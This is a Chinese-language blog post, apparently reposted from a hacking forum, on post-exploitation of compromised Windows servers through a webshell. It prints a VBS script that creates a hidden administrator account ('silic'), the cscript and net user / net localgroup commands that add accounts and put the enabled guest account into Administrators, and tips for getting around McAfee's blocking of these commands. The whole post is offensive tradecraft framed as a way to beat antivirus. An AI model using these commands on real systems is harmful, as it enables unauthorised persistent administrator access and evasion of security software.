企业资讯
- 企业新闻
- 行业文章

远程组策略与麦咖啡的那点事

先看第一件
我们在Windows下使用webshell的时候，通常会这样创建一个管理员账户：
在某个可执行目录创建一个XX.vbs，内容大体如下：

     set wsnetwork=CreateObject(“WSCRIPT.NETWORK”)//创建组件     os=”WinNT://”&amp;wsnetwork.ComputerName//通讯     Set ob=GetObject(os)//获取组件     Set oe=GetObject(os&amp;”/Administrators,group”)//administrators用户组     Set od=ob.Create(“user”,”silic”)//用户名silic     od.SetPassword “silic”//密码silic     od.SetInfo     Set of=GetObject(os&amp;”/silic”,user)     oe.add os&amp;”/silic”

set wsnetwork=CreateObject(“WSCRIPT.NETWORK”)//创建组件

os=“WinNT://”&wsnetwork.ComputerName//通讯

Set ob=GetObject(os)//获取组件

Set oe=GetObject(os&“/Administrators,group”)//administrators用户组

Set od=ob.Create(“user”,“silic”)//用户名silic

od.SetPassword “silic”//密码silic

od.SetInfo

Set of=GetObject(os&“/silic”,user)

oe.add os&“/silic”

将这段信息保存到c:xx.vbs 然后在command line中执行

     cscript c:xx.vbs

1	cscript c:xx.vbs

这样就成功使用webshell添加了一个管理员。
不过cscript有一个非常非常大的缺点，就是，一般来激昂，这样的vbs添加的账户，名称和密码都非常短，而系统通常对账户的密码长度有限制，是在组策略里面的，例如：

这个时候，在cscript执行vbs里面一般是无这样的错误回显的
例如：

     cscript C:a.vbs &amp; net user

1	cscript C:a.vbs & net user

在webshell中得到的却是

     Microsoft (R) Windows Script Host Version 5.6     Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.      User accounts for W2K3-ARCOIRIS     ——————————————————————————-     Administrator            ASPNET                   Guest     SUPPORT_388945a0     The command completed successfully.

Microsoft (R) Windows Script Host Version 5.6

User accounts for W2K3-ARCOIRIS

–––––––––––––––––––––––––––––––––––––––-

Administrator ASPNET Guest

SUPPORT_388945a0

The command completed successfully.

而实际情况却是：

     The password does not meet the password policy requirements. Check the minimum password length, password complexity and password history requirements.

1	The password does not meet the password policy requirements. Check the minimum password length, password complexity and password history requirements.

也就是密码不满足策略中限定的最低位数要求

第二事情是关于麦咖啡的。服务器中如果装了杀毒软件其实很正常，要说最好的，那说什么的都要。不过要是事多的，还要数麦咖啡
麦咖啡那些事之copy旁注：
虚拟主机如果对目录权限设定的很严，但是wscript启用的话，可以考虑用copy把webshell拷贝到目标目录。不过麦咖啡通常会把这个命令给限制掉，执行失败+无回显，可谓是郁闷之极，这样的控制让人一时摸不到头脑：失败的原因出在哪里？
麦咖啡那些事之taskkill：
这个不用说，自然是被麦咖啡限制死的
麦咖啡那些事之net：
webshell可以net user是比较常见的，不过要是可以

     net localgroup administrators guest /add

1	net localgroup administrators guest /add

将来宾账户添加到administrators用户组的，一般都可以

     net user silic silic /add     net user guest 新密码

1 2	net user silic silic /add net user guest 新密码

执行添加账户和更改guest密码这两条命令的。
但是，悲剧的是，我net user显示The command completed successfully
然后net user silic silic!&11133 /add无回显了，好吧
net user guest /active:yes显示The command completed successfully
net user guest silic123!pass无回显了
net localgroup administrators guest /add又显示The command completed successfully
我把服务器上的麦咖啡关掉之后，就全部successfully了，麦咖啡这下把我彻底的郁闷了一把（以上几条命令都是在webshell中执行的）

link：http://bbs.blackbap.org/thread-2085-1-1.html

91ri.org：不直接net user而是启用了guest并加入管理员组的方式就能秒杀看似神奇的麦咖啡杀软，这再次证明了一个道理：只要是人设计的程序都会有漏洞，只要不局限于老思维就能发现新大陆。

相关文章推荐《[集合]解决system权限3389无法添加的用户情况》

本文由网络安全攻防研究室（www.91ri.org）信息安全小组收集整理，转载请注明出处。

鸿大千秋网站建设团队敬上